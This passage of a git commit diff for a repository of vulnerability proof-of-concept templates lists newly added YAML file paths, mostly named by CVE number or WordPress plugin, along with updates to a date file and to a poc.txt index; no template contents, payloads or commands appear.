poc/cve/CVE-2024-53789-5b6e3f5ca751c7bbefd2d2d0478e9118.yaml create mode 100644 poc/cve/CVE-2024-53790-4ea0f5d6a4c4995649db61ceb9cfefd1.yaml create mode 100644 poc/cve/CVE-2024-53791-baff954ee6f7d9891e0773323ee016bc.yaml create mode 100644 poc/cve/CVE-2024-53792-79e219d8701a1b03429312ab9d2266e2.yaml create mode 100644 poc/cve/CVE-2024-53793-d3005914f049e11801fdde85b91a6bf6.yaml create mode 100644 poc/cve/CVE-2024-8485-fa09b925d5408de5c1804d1d70100e86.yaml create mode 100644 poc/cve/CVE-2024-9270-54f88c5ac9605569d0f73ca27f9f2362.yaml create mode 100644 poc/cve/CVE-2024-9705-47f72a4a6e0c73ca568cee56cbebba9e.yaml create mode 100644 poc/cve/CVE-2024-9706-c93a0ea327575103c1bd40e9f8d3b76b.yaml create mode 100644 poc/cve/CVE-2024-9769-04f41ad5af8b4a40298696fa6f430b08.yaml create mode 100644 poc/cve/CVE-2024-9866-7390d9a349370910408c5562d135bc89.yaml create mode 100644 poc/cve/CVE-2024-9872-0a2b107a70a05e6330557fd04ebc29f7.yaml create mode 100644 poc/header/simple-header-and-footer-2f2d13d68d1aa9ea670e89d2619faa2d.yaml create mode 100644 poc/microsoft/cluevo-lms-ba6446ba5ad9a5f47c413928535e804a.yaml create mode 100644 poc/microsoft/pojo-forms-889210e907a32f3bac90ac14ce08d937.yaml create mode 100644 poc/open_redirect/eelv-redirection.yaml create mode 100644 poc/other/advanced-what-should-we-write-about-next-f83be05ea88f2f446101c8a2b115a53a.yaml create mode 100644 poc/other/ai-quiz-31f0fc808945baa02a83ad64def460f0.yaml create mode 100644 poc/other/arca-payment-gateway-348f645a41831338e3ad29ac7c3259b9.yaml create mode 100644 poc/other/armember-membership-f395947e480c6bd2b9668c739bc544ea.yaml create mode 100644 poc/other/azure-storage-sas-leak.yaml create mode 100644 poc/other/build-app-online-9dd1526748a52141c3bb31208d05fbb4.yaml create mode 100644 poc/other/cf7-message-filter-c1a17d8e31627d5c93bdc282adcf65c6.yaml create mode 100644 poc/other/clickbank-storefront-8afd882eedd0c6f2566c03372054a9da.yaml create mode 100644 poc/other/cosmosfarm-share-buttons-ecfd254ef292ce73504cf2aba9045a31.yaml create mode 100644 poc/other/cowidgets-elementor-addons-b5f3c81a63289463e2ed249c024ac15f.yaml create mode 100644 poc/other/cpt-to-map-store-4d44e2fa98e9402abb36eca1074de857.yaml create mode 100644 poc/other/dancepress-trwa-731e3e5e4597e7faa251c93c238e74cd.yaml create mode 100644 poc/other/depicter-91350bdff3ee5a46d0032f5a28a6265e.yaml create mode 100644 poc/other/devnex-addons-for-elementor-9a3e30634b4dc7fbfd732639244dc3ab.yaml create mode 100644 poc/other/donate-me-574b61de3d2f5e0e6650c80193c07c44.yaml create mode 100644 poc/other/essential-breadcrumbs-2267a02f90f738f304f189dd1027700a.yaml create mode 100644 poc/other/event-tickets-with-ticket-scanner-e282372c4562ecaf77b223ee7da1e18e.yaml create mode 100644 poc/other/fastbook-responsive-appointment-booking-and-scheduling-system-32675851747f22022fefedfa5bef2428.yaml create mode 100644 poc/other/fd-elementor-button-plus-3ed7fab53de695a4fcfb576680a10315.yaml create mode 100644 poc/other/flixita-69e3979808a27506066d883a9f8eb4e6.yaml create mode 100644 poc/other/folder-gallery-1e6185b69c7ba994a4d3f38a05160b82.yaml create mode 100644 poc/other/friends-808e945853b70d97c7af6eefcb7afa6c.yaml create mode 100644 poc/other/gallery-videos-3ff175744c927034ff36b2d07fcbc5d1.yaml create mode 100644 poc/other/gallery-videos-f2aafb7e611c06dc54124ab527015f64.yaml create mode 100644 poc/other/gold-addons-for-elementor-7eaebe2336e04d77baf7d72493304929.yaml create mode 100644 poc/other/kivicare-clinic-management-system-36736e541fef2ef4d937383b3514fc1b.yaml create mode 100644 poc/other/kivicare-clinic-management-system-652da11115c2f950c640dcb31343ea31.yaml create mode 100644 poc/other/kivicare-clinic-management-system-e972e5fa7dc7eb147901d9e27c2ac74c.yaml create mode 100644 poc/other/lenxel-core-4972ccccaaba94b2ac118dc56066bfe6.yaml create mode 100644 poc/other/lenxel-core-c40309757059a7c5f5e2a082116ad730.yaml create mode 100644 poc/other/load-more-posts-f94901beaffb62ce5c913ef672f4eb96.yaml create mode 100644 poc/other/mail-picker-303b0f9000254327c2e69e892380ecb9.yaml create mode 100644 poc/other/meeting-scheduler-by-vcita-7c52a014cce8f41b194342f08ceede41.yaml create mode 100644 poc/other/mins-to-read-2941ea333622216e1c6091029b0b178a.yaml create mode 100644 poc/other/newsmash-6377f947dc4cbd6377b900e7b2a109af.yaml create mode 100644 poc/other/newsmunch.yaml create mode 100644 poc/other/onlyoffice-b402953c76f82d1b88842a9ee0c31f2f.yaml create mode 100644 poc/other/photo-video-store-9887b9e8aa29c789cc721ef3d676a573.yaml create mode 100644 poc/other/pixobe-cartography-b8d402b7f8267a8fbeabdc06350287fa.yaml create mode 100644 poc/other/plugin-951ffa4455cde2cf84338c23f5961c7d.yaml create mode 100644 poc/other/post-carousel-slider-for-elementor-7ce3093d4f3e9adea14ad773b3a3df2a.yaml create mode 100644 poc/other/powerpack-lite-for-elementor-a7a3589609ae92e0dc1bd8b339906582.yaml create mode 100644 poc/other/pubnews-5b335bb90b570f570873fbfa38b47c5b.yaml create mode 100644 poc/other/random-banner-0b21c7eea2233a52fab8c4a62c453192.yaml create mode 100644 poc/other/rccp-free-addabdad3f0edc1afcad78dcfe322e09.yaml create mode 100644 poc/other/simple-popup-plugin-cf96f5f0cc1e34ba0f87c5a246e6b6a7.yaml create mode 100644 poc/other/simpleschema-free-d19ba041fbf80d78fb62d140a19bbe1d.yaml create mode 100644 poc/other/skyboot-portfolio-gallery-b1da3f38e609312a5083d34cf5925003.yaml create mode 100644 poc/other/smart-popup-blaster-30df007059118a37ebbef148c110f5c7.yaml create mode 100644 poc/other/softtemplates-for-elementor-ecddfed759e913087d218b9e237f2c06.yaml create mode 100644 poc/other/soledad-29fa607193cd3b39b09ca02b2ce4f403.yaml create mode 100644 poc/other/sparkle-elementor-kit-4c18bc0aa3ca26a81086e7ea47ef5b19.yaml create mode 100644 poc/other/splash-connector-a408956eb25c0fc5ebb6237dc9efaaab.yaml create mode 100644 poc/other/sv100-companion-9407692ccefc1b1607863a7068a9481a.yaml create mode 100644 poc/other/swift-performance-lite-9d1b83ae9017d2fadd1702f8770861b6.yaml create mode 100644 poc/other/twentytwenty-008f64526c3780ff8f14b386a2edcab8.yaml create mode 100644 poc/other/uber-grid-356fe3fbd1593fabd8654043fb4bf3f8.yaml create mode 100644 poc/other/ultimate-coming-soon-1b1151732f9e837b52353dea3817cd15.yaml create mode 100644 poc/other/ultimate-coming-soon-be5df66158fd08241f78579ea8d369cd.yaml create mode 100644 poc/other/watu-690d8bcd0e263bad7d88f01f7c626e23.yaml create mode 100644 poc/other/wip-woocarousel-lite.yaml create mode 100644 poc/other/woo-pdf-invoice-builder-b3d98dd124afa7dc460f57d96fd05347.yaml create mode 100644 poc/other/xl-tab-40f41253ca6b22bb907999b982dcace4.yaml create mode 100644 poc/other/yahoo-media-player-6d6ac328025439c4bf1dd52ca758d69c.yaml create mode 100644 poc/other/znajdz-prace-z-pracapl-f64257e15582ca43c7ad0a549fe64fd8.yaml create mode 100644 poc/remote_code_execution/accounting-for-woocommerce.yaml create mode 100644 poc/remote_code_execution/multilevel-referral-plugin-for-woocommerce-20b3dc25777d2d4d55cfa2c7a3d7144f.yaml create mode 100644 poc/remote_code_execution/nextcart-woocommerce-migration-2e2806962d8874bbd69c8d26bf481248.yaml create mode 100644 poc/remote_code_execution/ni-woocommerce-cost-of-goods-66898c5242c9d33ba57cb7fe04ac3a35.yaml create mode 100644 poc/remote_code_execution/woocommerce-ultimate-gift-card-f2d90f9b034e1f97969a83011a928867.yaml create mode 100644 poc/search/spatialmatch-free-lifestyle-search-67ee26ea0af5450a37293a361423bdd3.yaml create mode 100644 poc/sql/CVE-2024-10874-7dbd16c02b43e8a0bfabb5ba2cd1028e.yaml create mode 100644 poc/sql/CVE-2024-11178-1d03d4b0d9125cf395a9b36a817c53db.yaml create mode 100644 poc/sql/CVE-2024-11201-aa3d65db710ab72aee8e6c78d61fbc19.yaml create mode 100644 poc/sql/CVE-2024-11444-4063529e850dc8cdb770b409a5b563ef.yaml create mode 100644 poc/sql/CVE-2024-11450-aa0eea523b63076daf425f6ddb400979.yaml create mode 100644 poc/sql/CVE-2024-11728-2c0f50aa3db592d906a698b62cca69c7.yaml create mode 100644 poc/sql/CVE-2024-11823-96487c8862c6208dac1f43cc4dba71e2.yaml create mode 100644 poc/sql/CVE-2024-39626-ad9b3818c747f1ed3832fbdce623db21.yaml create mode 100644 poc/sql/CVE-2024-53745-5b88f5f8304e8fddbc476a349ec52bdb.yaml create mode 100644 poc/sql/CVE-2024-53759-dbad57d1fe7a81773ada836f186bcbb3.yaml create mode 100644 poc/sql/CVE-2024-53786-e41d57d430f469f2f89c135637eddbf0.yaml create mode 100644 poc/sql/CVE-2024-53790-4ea0f5d6a4c4995649db61ceb9cfefd1.yaml create mode 100644 poc/sql/best-addons-for-elementor-bd743f52479cb010ad232ebee7dbf30b.yaml create mode 100644 poc/sql/bin-stripe-donation-26be16d9007bef8defcdb810970efcf9.yaml create mode 100644 poc/sql/capitalize-my-title-ebc5f77da2159725c00bfadc6477c6db.yaml create mode 100644 poc/sql/chatter-50f846e0f4847e28db594b1f3b22c537.yaml create mode 100644 poc/sql/content-audit-exporter-e79372032f3cd9964820840ddb7f0ea3.yaml create mode 100644 poc/sql/countdown-timer-for-elementor-e125cc11edbf54c4514f0c2218a86a07.yaml create mode 100644 poc/sql/cultbooking-booking-engine-5eb904d4a3173fdb3278f6a25598e63f.yaml create mode 100644 poc/sql/mycred-b69b74183494c4b8dbaaa94b47c77a89.yaml create mode 100644 poc/sql/out-of-stock-badge-824e800865ecf93bf8922dba7aad4e65.yaml create mode 100644 poc/sql/paypal-responder-2bb28c0dbe7d31806c826438ecefef2f.yaml create mode 100644 poc/sql/plugin-5dcfaa6624128695b8dbff266dad887f.yaml create mode 100644 poc/sql/verowa-connect-e19e41c4fd554c823dba2f39d46b632a.yaml create mode 100644 poc/sql/vertical-carousel-slider-02cbab9c2d567c8a51e8bba1e79d8db9.yaml create mode 100644 poc/sql/wp-media-optimizer-webp-db74fce5b7adcf6651896f57aad35a67.yaml create mode 100644 poc/web/wp-media-optimizer-webp-db74fce5b7adcf6651896f57aad35a67.yaml create mode 100644 poc/wordpress/forumwp-aaeb37a4320ca1cfa0565e89a95a01bb.yaml create mode 100644 poc/wordpress/forumwp-b74a371b4e61bc84d659569310ff3232.yaml create mode 100644 poc/wordpress/smart-marketing-for-wp-9730906988033bfae8062aec3f96a7aa.yaml create mode 100644 poc/wordpress/threewp-broadcast-82473e0c5aa4cc508b6700e7d6fff64e.yaml create mode 100644 poc/wordpress/video-player-for-wpbakery-9c2d47674bd034385887846ea596ce8b.yaml create mode 100644 poc/wordpress/wp-find-your-nearest-52e62929115acbdac3eec0fd5a13d231.yaml create mode 100644 poc/wordpress/wp-hide-security-enhancer-94f0ee6838b2f0b8be9cc18455fff889.yaml create mode 100644 poc/wordpress/wp-mathjax-plus-178bdd1913c816f82e7f19af89ce62f9.yaml create mode 100644 poc/wordpress/wp-media-optimizer-webp-db74fce5b7adcf6651896f57aad35a67.yaml create mode 100644 poc/wordpress/wp-mermaid-384c0a7cc618fb29d85738396ef5ac01.yaml create mode 100644 poc/wordpress/wp-private-content-plus-77641909bd19731b0b84338bb1bae5f0.yaml create mode 100644 poc/wordpress/wp-system-06fc769dd5f956e0682bf74af252b00f.yaml diff --git a/date.txt b/date.txt index 5f2357c99f..9093ce495f 100644 --- a/date.txt +++ b/date.txt @@ -1 +1 @@ -20241205 +20241206 diff --git a/poc.txt b/poc.txt index e7a07433bb..7664237a47 100644 --- a/poc.txt +++ b/poc.txt @@ -1051,6 +1051,7 @@ ./poc/api/burp-api-detect-812.yaml ./poc/api/burp-api-detect-813.yaml ./poc/api/burp-api-detect.yaml +./poc/api/capitalize-my-title-ebc5f77da2159725c00bfadc6477c6db.yaml ./poc/api/cart-rest-api-for-woocommerce-863e46252f4619353ac6e316726d18cc.yaml ./poc/api/cart-rest-api-for-woocommerce.yaml ./poc/api/clickhouse-api-unauth.yaml @@ -2647,6 +2648,7 @@ ./poc/auth/cookiebot.yaml ./poc/auth/cookiehub-aa4595d84974fda5e2ed2c93116d9b1f.yaml ./poc/auth/cookiehub.yaml +./poc/auth/cookielay-d1709b11e04e7ac0020e84fff5516e5a.yaml ./poc/auth/cookiemonster-b03efd98535cb1491a9c6a9735c7d0eb.yaml ./poc/auth/cookiemonster.yaml ./poc/auth/cookies-and-content-security-policy-01ad7a832bf07caf4715cade7c58a20e.yaml @@ -4317,6 +4319,7 @@ ./poc/auth/mycred-975ce1886c4ca598930d96fa67c4b8de.yaml ./poc/auth/mycred-9c9dcd07bbf18d8b82e863c99230019e.yaml ./poc/auth/mycred-ab15e8f26c6360efdd6040bbe367680e.yaml +./poc/auth/mycred-b69b74183494c4b8dbaaa94b47c77a89.yaml ./poc/auth/mycred-c64e04f4ee706d21106c1d7bac20cb1c.yaml ./poc/auth/mycred-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/auth/mycred-d5c4fcd6192c906be2ff0430f97baff7.yaml @@ -4592,6 +4595,7 @@ ./poc/auth/oracle-people-sign-in-9399.yaml ./poc/auth/oracle-people-sign-in.yaml ./poc/auth/orbiteam-bscw-server-unauthenticated-lfi.yaml +./poc/auth/otp-login-59e25716cd4187f6ae0041590ffc4112.yaml ./poc/auth/ov3-online-administration-unauthenticated-lfi.yaml ./poc/auth/paloalto-networks-sso.yaml ./poc/auth/panabit-default-login-9437.yaml @@ -5477,6 +5481,7 @@ ./poc/auth/theme-my-login-c0adcf17190736222b76d990855c6100.yaml ./poc/auth/theme-my-login.yaml ./poc/auth/thingsboard-access-token.yaml +./poc/auth/third-party-cookie-eraser-a95c341c56a938945d517c311512eb15.yaml ./poc/auth/threatq-login-10756.yaml ./poc/auth/threatq-login-10757.yaml ./poc/auth/threatq-login.yaml @@ -9144,6 +9149,7 @@ ./poc/cve/CVE-2011-4804.yaml ./poc/cve/CVE-2011-4926-1779d9229b83a1399466ae14361bbefb.yaml ./poc/cve/CVE-2011-4926-2088.yaml +./poc/cve/CVE-2011-4926-2089.yaml ./poc/cve/CVE-2011-4926-2091.yaml ./poc/cve/CVE-2011-4926.yaml ./poc/cve/CVE-2011-4955-2c9bc7dc49f1d6049f053f437b9d7049.yaml @@ -9177,6 +9183,7 @@ ./poc/cve/CVE-2011-5181-2112.yaml ./poc/cve/CVE-2011-5181-2116.yaml ./poc/cve/CVE-2011-5181-2117.yaml +./poc/cve/CVE-2011-5181-2118.yaml ./poc/cve/CVE-2011-5181-8491a0a59b643c19df3fee90d0e2a8a9.yaml ./poc/cve/CVE-2011-5181.yaml ./poc/cve/CVE-2011-5191-51bd4faa48cb8b323facb932108c5e3b.yaml @@ -11865,6 +11872,7 @@ ./poc/cve/CVE-2016-1000134-2679.yaml ./poc/cve/CVE-2016-1000134-f4029376afda7fca93cc3ed29f8a800b.yaml ./poc/cve/CVE-2016-1000134.yaml +./poc/cve/CVE-2016-1000135-2681.yaml ./poc/cve/CVE-2016-1000135-2683.yaml ./poc/cve/CVE-2016-1000135-2684.yaml ./poc/cve/CVE-2016-1000135-2685.yaml @@ -13513,6 +13521,7 @@ ./poc/cve/CVE-2018-16206-c31676a05fcabd0345611f3ea7f42c3e.yaml ./poc/cve/CVE-2018-16206.yaml ./poc/cve/CVE-2018-16283-0a28c1c4cc9c5b5aca5acd94bd9b3b69.yaml +./poc/cve/CVE-2018-16283-3362.yaml ./poc/cve/CVE-2018-16283.yaml ./poc/cve/CVE-2018-16285-c3c8a5c2988068028f0e9e257661ab03.yaml ./poc/cve/CVE-2018-16285.yaml @@ -13803,6 +13812,7 @@ ./poc/cve/CVE-2018-3760.yaml ./poc/cve/CVE-2018-3810-3554.yaml ./poc/cve/CVE-2018-3810-3555.yaml +./poc/cve/CVE-2018-3810-3557.yaml ./poc/cve/CVE-2018-3810-6de071448d5adb9d4c6352281eb7005f.yaml ./poc/cve/CVE-2018-3810.yaml ./poc/cve/CVE-2018-3811-385c337e25130e5d61f4f32a2f113d5e.yaml @@ -16193,6 +16203,7 @@ ./poc/cve/CVE-2020-8658-0284295106abbcc85275b72b5aa54300.yaml ./poc/cve/CVE-2020-8658.yaml ./poc/cve/CVE-2020-8771-5336.yaml +./poc/cve/CVE-2020-8771-5339.yaml ./poc/cve/CVE-2020-8771-69608ea8c92bdaaf7f1a2b586a50b63f.yaml ./poc/cve/CVE-2020-8771.yaml ./poc/cve/CVE-2020-8772 (copy 1).yaml @@ -16618,6 +16629,7 @@ ./poc/cve/CVE-2021-24225-bcf995267e90e3cc63f9a02bf6b87efc.yaml ./poc/cve/CVE-2021-24225.yaml ./poc/cve/CVE-2021-24226-5645.yaml +./poc/cve/CVE-2021-24226-5648.yaml ./poc/cve/CVE-2021-24226-ce003cda2a7fdf989943ff2a7c0fe217.yaml ./poc/cve/CVE-2021-24226.yaml ./poc/cve/CVE-2021-24227-656a26809b7464f324229a4abc1031bd.yaml @@ -16723,6 +16735,7 @@ ./poc/cve/CVE-2021-24273-10f609f202db10a6a9875caf578e9466.yaml ./poc/cve/CVE-2021-24273.yaml ./poc/cve/CVE-2021-24274-5658.yaml +./poc/cve/CVE-2021-24274-5660.yaml ./poc/cve/CVE-2021-24274-c0de31a7825ac9622f57009054aa149c.yaml ./poc/cve/CVE-2021-24274.yaml ./poc/cve/CVE-2021-24275-5661.yaml @@ -16788,6 +16801,7 @@ ./poc/cve/CVE-2021-24297-22f032ffb815dcd080e766b46019670a.yaml ./poc/cve/CVE-2021-24297.yaml ./poc/cve/CVE-2021-24298-3527710bdd7422152bd92d39233e4083.yaml +./poc/cve/CVE-2021-24298-5686.yaml ./poc/cve/CVE-2021-24298-5687.yaml ./poc/cve/CVE-2021-24298-5688.yaml ./poc/cve/CVE-2021-24298.yaml @@ -16828,6 +16842,7 @@ ./poc/cve/CVE-2021-24316-2813a1d60b58f7217403cc4e686b51f8.yaml ./poc/cve/CVE-2021-24316-5689.yaml ./poc/cve/CVE-2021-24316-5691.yaml +./poc/cve/CVE-2021-24316-5695.yaml ./poc/cve/CVE-2021-24316-d168751b238f28a1a68263abeb6f4c7a.yaml ./poc/cve/CVE-2021-24316.yaml ./poc/cve/CVE-2021-24317-dfd9bd55d8a4d4cc599169686f7f08ba.yaml @@ -17242,6 +17257,7 @@ ./poc/cve/CVE-2021-24509-9e53895ae638a7e8cfc6fe7e1599f34c.yaml ./poc/cve/CVE-2021-24509.yaml ./poc/cve/CVE-2021-24510-5758.yaml +./poc/cve/CVE-2021-24510-5759.yaml ./poc/cve/CVE-2021-24510-6c28986cc17c5644f049342400ae6c18.yaml ./poc/cve/CVE-2021-24510.yaml ./poc/cve/CVE-2021-24511-bb2ec5de3b1fb9084a4e4bc2f40c53b6.yaml @@ -17899,6 +17915,7 @@ ./poc/cve/CVE-2021-24838-193631008f48769f14ce31f773b10581.yaml ./poc/cve/CVE-2021-24838-5767.yaml ./poc/cve/CVE-2021-24838-5768.yaml +./poc/cve/CVE-2021-24838-5769.yaml ./poc/cve/CVE-2021-24838.yaml ./poc/cve/CVE-2021-24839-b54cf1fedbcdd93956474a85392276cb.yaml ./poc/cve/CVE-2021-24839.yaml @@ -20580,6 +20597,7 @@ ./poc/cve/CVE-2022-1605.yaml ./poc/cve/CVE-2022-1608-7d106179563c4124306bf651834445b6.yaml ./poc/cve/CVE-2022-1608.yaml +./poc/cve/CVE-2022-1609(1).yaml ./poc/cve/CVE-2022-1609-b8b166aada92410fb1f2f9b2f53918ca.yaml ./poc/cve/CVE-2022-1609.yaml ./poc/cve/CVE-2022-1610-fff8ab2c8c6bb0ed58b0b33dc7b8e8cb.yaml @@ -26266,6 +26284,7 @@ ./poc/cve/CVE-2023-2414.yaml ./poc/cve/CVE-2023-2415-5de376ba13565bd67530c98131e13dd3.yaml ./poc/cve/CVE-2023-2415.yaml +./poc/cve/CVE-2023-2416-b6e308449e56a72318f3547f11c5f544.yaml ./poc/cve/CVE-2023-2416-d2ec2eed287e58f90d3c86cbb07595d1.yaml ./poc/cve/CVE-2023-2416.yaml ./poc/cve/CVE-2023-24243.yaml @@ -34210,6 +34229,7 @@ ./poc/cve/CVE-2024-0678.yaml ./poc/cve/CVE-2024-0679-ee501df61dac24ab9c37a22889e58e87.yaml ./poc/cve/CVE-2024-0679.yaml +./poc/cve/CVE-2024-0680-0ba13fa9274659992e0f27178c53ade5.yaml ./poc/cve/CVE-2024-0680-9313796b24a8fcfd217ef8d1a90a8725.yaml ./poc/cve/CVE-2024-0680.yaml ./poc/cve/CVE-2024-0681-133acab13d9998d70956a30cfed544d4.yaml @@ -34481,6 +34501,7 @@ ./poc/cve/CVE-2024-10055-a7567bb6df1c6f932e81f3fa194c2a29.yaml ./poc/cve/CVE-2024-10055.yaml ./poc/cve/CVE-2024-10056-a8d2a1d47ca5a0c2f053a977af04fb8c.yaml +./poc/cve/CVE-2024-10056.yaml ./poc/cve/CVE-2024-10057-3619138af4b1755697a61cf7520ca3e3.yaml ./poc/cve/CVE-2024-10057.yaml ./poc/cve/CVE-2024-10078-ac3355172629b828c0c05e8735d48816.yaml @@ -34535,6 +34556,7 @@ ./poc/cve/CVE-2024-10177-cd099857e17e9d5daf937c4caff0288e.yaml ./poc/cve/CVE-2024-10177.yaml ./poc/cve/CVE-2024-10178-8d00ef32d8cfb13b51bc10bd4d6d2d45.yaml +./poc/cve/CVE-2024-10178.yaml ./poc/cve/CVE-2024-10179-99e78b7be5cf73a1cef31eb112268c96.yaml ./poc/cve/CVE-2024-10179.yaml ./poc/cve/CVE-2024-10180-cda9906f3b0afcef720a2edb145ba669.yaml @@ -34566,6 +34588,7 @@ ./poc/cve/CVE-2024-10233.yaml ./poc/cve/CVE-2024-10245-36e3bfba2394d4b95bdad2a14d8741f6.yaml ./poc/cve/CVE-2024-10245.yaml +./poc/cve/CVE-2024-10247-7e9248f7d08a8c804a85ce87492c023b.yaml ./poc/cve/CVE-2024-10250-381303a6df453508271ce4a14d6f5e15.yaml ./poc/cve/CVE-2024-10250.yaml ./poc/cve/CVE-2024-10260-0f500cb04d1d9154639ea4ef28029202.yaml @@ -34603,6 +34626,7 @@ ./poc/cve/CVE-2024-10316.yaml ./poc/cve/CVE-2024-10319-5c0b2e6241c7af29d146faf4b6581f3b.yaml ./poc/cve/CVE-2024-10319.yaml +./poc/cve/CVE-2024-10320-f49b48a1fa24c03d49f1d0779bc05074.yaml ./poc/cve/CVE-2024-10323-3b68b4ce641de125944f01ebe9a88071.yaml ./poc/cve/CVE-2024-10323.yaml ./poc/cve/CVE-2024-10325-402ce314182729d314273aac0547c13d.yaml @@ -34692,6 +34716,7 @@ ./poc/cve/CVE-2024-1051.yaml ./poc/cve/CVE-2024-10515-5613c1285c13db3e8e7567a1d6eaba45.yaml ./poc/cve/CVE-2024-10515.yaml +./poc/cve/CVE-2024-10516-90da3b799283fae5783fef07a67bdeef.yaml ./poc/cve/CVE-2024-10519-e4ed2d5cfcede1f54bb2e43cfa2269d7.yaml ./poc/cve/CVE-2024-10519.yaml ./poc/cve/CVE-2024-10520-e565e8010591b8cf25b393d5f18f3d3c.yaml @@ -34751,6 +34776,7 @@ ./poc/cve/CVE-2024-10577-03e59e27ad2ae9ca6f8945bd8581720d.yaml ./poc/cve/CVE-2024-10577-c910dfbedc2df85177b53310160d01a7.yaml ./poc/cve/CVE-2024-10577.yaml +./poc/cve/CVE-2024-10578-6bc0121b7a6d48f214b8939cb1f78d29.yaml ./poc/cve/CVE-2024-10579-3b42e924fd20aca47fa65689d369e300.yaml ./poc/cve/CVE-2024-10579.yaml ./poc/cve/CVE-2024-1058-ee29f13d5975fd520360e5ea7be92c39.yaml @@ -34831,6 +34857,7 @@ ./poc/cve/CVE-2024-10677.yaml ./poc/cve/CVE-2024-1068-9cafdd7123cc13ec1ddd7f5534904f5e.yaml ./poc/cve/CVE-2024-1068.yaml +./poc/cve/CVE-2024-10681-074ccd2e143d120107ec916d21cfe73a.yaml ./poc/cve/CVE-2024-10682-845790654070752f55040438702d276d.yaml ./poc/cve/CVE-2024-10682-99be99ab3c687f004931a9abe6a2c2f0.yaml ./poc/cve/CVE-2024-10682.yaml @@ -34846,8 +34873,10 @@ ./poc/cve/CVE-2024-10687.yaml ./poc/cve/CVE-2024-10688-4e865d55bfaf7ccff8ab4229b44e4c7b.yaml ./poc/cve/CVE-2024-10688.yaml +./poc/cve/CVE-2024-10689-ec644bcff6b8252f58e7ce0b4795467c.yaml ./poc/cve/CVE-2024-1069-eade4f165a3dd4a95074ea430cf7d5a1.yaml ./poc/cve/CVE-2024-1069.yaml +./poc/cve/CVE-2024-10692-c75c741c420e4c515c59f2646be4e222.yaml ./poc/cve/CVE-2024-10693-c432d0b08f287a25140732c41d4a1ed1.yaml ./poc/cve/CVE-2024-10693.yaml ./poc/cve/CVE-2024-10695-d3f51a21505172dd3b75517abc1cda80.yaml @@ -34888,6 +34917,7 @@ ./poc/cve/CVE-2024-10770-c34a4a3efec7f5f02bdebaace96e792d.yaml ./poc/cve/CVE-2024-10770.yaml ./poc/cve/CVE-2024-10777-3d0f2c41b4182831f7340ab1eb913016.yaml +./poc/cve/CVE-2024-10777.yaml ./poc/cve/CVE-2024-10778-797064adc3334f08c3fbb1275f7b3b47.yaml ./poc/cve/CVE-2024-10778-fd80b84e6e4bfedee7b8d137c9c72b1b.yaml ./poc/cve/CVE-2024-10778.yaml @@ -34954,9 +34984,12 @@ ./poc/cve/CVE-2024-1083.yaml ./poc/cve/CVE-2024-10832-08cd101251aa1a9d6856998524059503.yaml ./poc/cve/CVE-2024-10832.yaml +./poc/cve/CVE-2024-10836-e5372e893ae8325e3b297cc93a19837f.yaml ./poc/cve/CVE-2024-10837-822bdf929bf75cae072305d22ba83f9d.yaml ./poc/cve/CVE-2024-10837.yaml ./poc/cve/CVE-2024-10848-7435d35ca01d98267edea517a3f5f67d.yaml +./poc/cve/CVE-2024-10848.yaml +./poc/cve/CVE-2024-10849-c4f62162d556d3b337dc88f33abf0608.yaml ./poc/cve/CVE-2024-10850-1086df4e1d6f59239e6e41cb5264dfd9.yaml ./poc/cve/CVE-2024-10850-1914522a12aa125c7663504eb5d5805e.yaml ./poc/cve/CVE-2024-10850.yaml @@ -34986,6 +35019,7 @@ ./poc/cve/CVE-2024-10872.yaml ./poc/cve/CVE-2024-10873-4dd27e8fb81cdeee3e70714a8ad3eb71.yaml ./poc/cve/CVE-2024-10873.yaml +./poc/cve/CVE-2024-10874-7dbd16c02b43e8a0bfabb5ba2cd1028e.yaml ./poc/cve/CVE-2024-10874-f04e19edf59553c6a738cb353e8b2d2f.yaml ./poc/cve/CVE-2024-10874.yaml ./poc/cve/CVE-2024-10875-45b6168ef90063fd32579a018f9eb47d.yaml @@ -34996,11 +35030,13 @@ ./poc/cve/CVE-2024-10877.yaml ./poc/cve/CVE-2024-10878-2a6958b657c7efaf0d338a4aea9db038.yaml ./poc/cve/CVE-2024-10878.yaml +./poc/cve/CVE-2024-10879-fdafc38df20050c33f2864a1f7138f44.yaml ./poc/cve/CVE-2024-1088-58bbbe61468292a1146bbabf2501df14.yaml ./poc/cve/CVE-2024-1088.yaml ./poc/cve/CVE-2024-10880-59c0038e0af4d28442c891a27a66f569.yaml ./poc/cve/CVE-2024-10880.yaml ./poc/cve/CVE-2024-10881-596695d2d6cc01668d710d28f9523f24.yaml +./poc/cve/CVE-2024-10881.yaml ./poc/cve/CVE-2024-10882-e797660f97ef668cb301cb3b9715bd4a.yaml ./poc/cve/CVE-2024-10882.yaml ./poc/cve/CVE-2024-10883-a21949176ab6e3c686e7a07e748a996d.yaml @@ -35032,6 +35068,7 @@ ./poc/cve/CVE-2024-1090.yaml ./poc/cve/CVE-2024-10900-15161f64578c8a72d2a1b43a0155d517.yaml ./poc/cve/CVE-2024-10900.yaml +./poc/cve/CVE-2024-10909-308c66fb506ba01c372d73eaeb9b223a.yaml ./poc/cve/CVE-2024-1091-cebf822ed68805638f7571c8df635233.yaml ./poc/cve/CVE-2024-1091.yaml ./poc/cve/CVE-2024-10913-293ddeaa8a2577b31fabdbc30afdd8d5.yaml @@ -35046,6 +35083,7 @@ ./poc/cve/CVE-2024-1093-7c034f664d389dd1d4714fd38e3096f8.yaml ./poc/cve/CVE-2024-1093.yaml ./poc/cve/CVE-2024-10937-e65765a33d97e7492f011b63b4951ffc.yaml +./poc/cve/CVE-2024-10937.yaml ./poc/cve/CVE-2024-1094-28bbaf5febf22938e52d5e0ad45af461.yaml ./poc/cve/CVE-2024-1094.yaml ./poc/cve/CVE-2024-1095-741eaa5507c75edbe90bc3ba4e40e5a9.yaml @@ -35054,6 +35092,7 @@ ./poc/cve/CVE-2024-10952.yaml ./poc/cve/CVE-2024-10958-b9e22eaad7c9ca71f94e8afa6dc3ff9c.yaml ./poc/cve/CVE-2024-10958.yaml +./poc/cve/CVE-2024-10961-60fb90d65f9868b90bab1ea437eb89b3.yaml ./poc/cve/CVE-2024-10961-c22c374f4ffe67db892c953e4cf45c93.yaml ./poc/cve/CVE-2024-10961.yaml ./poc/cve/CVE-2024-10962-b5d6c73fa07a42d3299578c2a0d3f408.yaml @@ -35119,6 +35158,7 @@ ./poc/cve/CVE-2024-11150.yaml ./poc/cve/CVE-2024-11154-529b37d71d1c447f23821a8d5e5c09ec.yaml ./poc/cve/CVE-2024-11154.yaml 